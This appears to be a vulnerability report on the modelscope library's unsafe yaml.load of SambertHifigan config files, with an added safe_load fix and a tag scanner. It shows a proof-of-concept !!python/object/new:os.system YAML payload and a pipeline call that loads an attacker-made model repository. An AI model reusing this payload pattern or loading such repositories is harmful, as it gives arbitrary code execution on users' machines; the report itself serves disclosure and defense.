Describe the bug
Similar to #1538, but the bug occurs at a different location. Specifically, when users try to load the SambertHifigan model from the modelscope hub, the modelscope library retrieves and parses the `config.yaml` under the particular `am` and `voc` folders to initialize the `Voice` class.
```python
import os
import yaml


class Voice:
    # Only the config loading is shown here; the real constructor takes
    # further arguments (voice_path is assumed to be the voice directory).
    def __init__(self, voice_path):
        self.am_config_path = os.path.join(voice_path, 'am', 'config.yaml')
        self.voc_config_path = os.path.join(voice_path, 'voc', 'config.yaml')
        # yaml.Loader is the full (unsafe) loader: it constructs arbitrary
        # Python objects named by tags in the file
        with open(self.am_config_path, 'r') as f:
            self.am_config = yaml.load(f, Loader=yaml.Loader)
        with open(self.voc_config_path, 'r') as f:
            self.voc_config = yaml.load(f, Loader=yaml.Loader)
```
Attackers can craft the malicious YAML to achieve arbitrary code execution.
```yaml
# above are benign YAML contents
payload: !!python/object/new:os.system ["echo '!!! Execute Malicious Payload !!!'"]
```
Then the payload will be executed silently without the user's awareness.
To Reproduce
I created two model repositories to demonstrate the remote code execution.
```python
from modelscope.pipelines import pipeline
from modelscope.utils.constant import Tasks

model_id = "XManFromXlab/modelscope-SambertHifigan-RCE"
p = pipeline(task=Tasks.text_to_speech, model=model_id)
```
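Added example (not part of this report and not modelscope's own code): the drop-in fix is `yaml.safe_load`, which refuses every tag in the `python/` namespace instead of constructing objects from it, and a cheap textual scan of a model repo's YAML for such tags gives a detection signal before any loader runs. The config keys below are a constructed sample, the `python/` tag in it only calls `str()`, and the `load_model_config` / `find_python_tags` names are my own.

```python
import re
from typing import Optional, Tuple

try:
    import yaml  # PyYAML; the tag scanner below also works without it
except ImportError:
    yaml = None

# Any YAML tag in the python/ namespace ("!!python/object/new:",
# "!!python/object/apply:", "!!python/name:", ...) asks PyYAML's unsafe
# loaders to build arbitrary Python objects. A model config never needs them.
PYTHON_TAG_RE = re.compile(r"!!?python/")

# Constructed sample; the key names are assumed, not taken from a real am/config.yaml.
BENIGN_CONFIG = """\
model:
  sample_rate: 16000
  n_mels: 80
"""

# Constructed sample carrying a python/ tag that merely calls str();
# a hostile config would aim the same mechanism at os.system, as the report shows.
TAGGED_CONFIG = BENIGN_CONFIG + """\
payload: !!python/object/apply:builtins.str ["tagged"]
"""


def find_python_tags(yaml_text: str) -> list:
    """Return (line_number, line) for every line carrying a python/ tag.

    Usable as a repo audit before any YAML loader touches the file.
    """
    return [(n, line) for n, line in enumerate(yaml_text.splitlines(), 1)
            if PYTHON_TAG_RE.search(line)]


def load_model_config(yaml_text: str) -> Tuple[Optional[dict], Optional[str]]:
    """Parse a config with yaml.safe_load, the replacement for yaml.load(f, Loader=yaml.Loader).

    Returns (config, None) on success or (None, error) when the document uses a
    tag the safe loader refuses; nothing in the document is ever executed.
    """
    if yaml is None:
        return None, "PyYAML not installed"
    try:
        return yaml.safe_load(yaml_text), None
    except yaml.constructor.ConstructorError as exc:
        return None, str(exc)


if __name__ == "__main__":
    print(find_python_tags(TAGGED_CONFIG))
    print(load_model_config(BENIGN_CONFIG))
    print(load_model_config(TAGGED_CONFIG))
```

With `safe_load` the tagged document fails with a `ConstructorError` naming the offending tag rather than running anything, so the `Voice` constructor only needs the loader swapped; the scanner is extra, for flagging repositories whose configs contain `python/` tags at all.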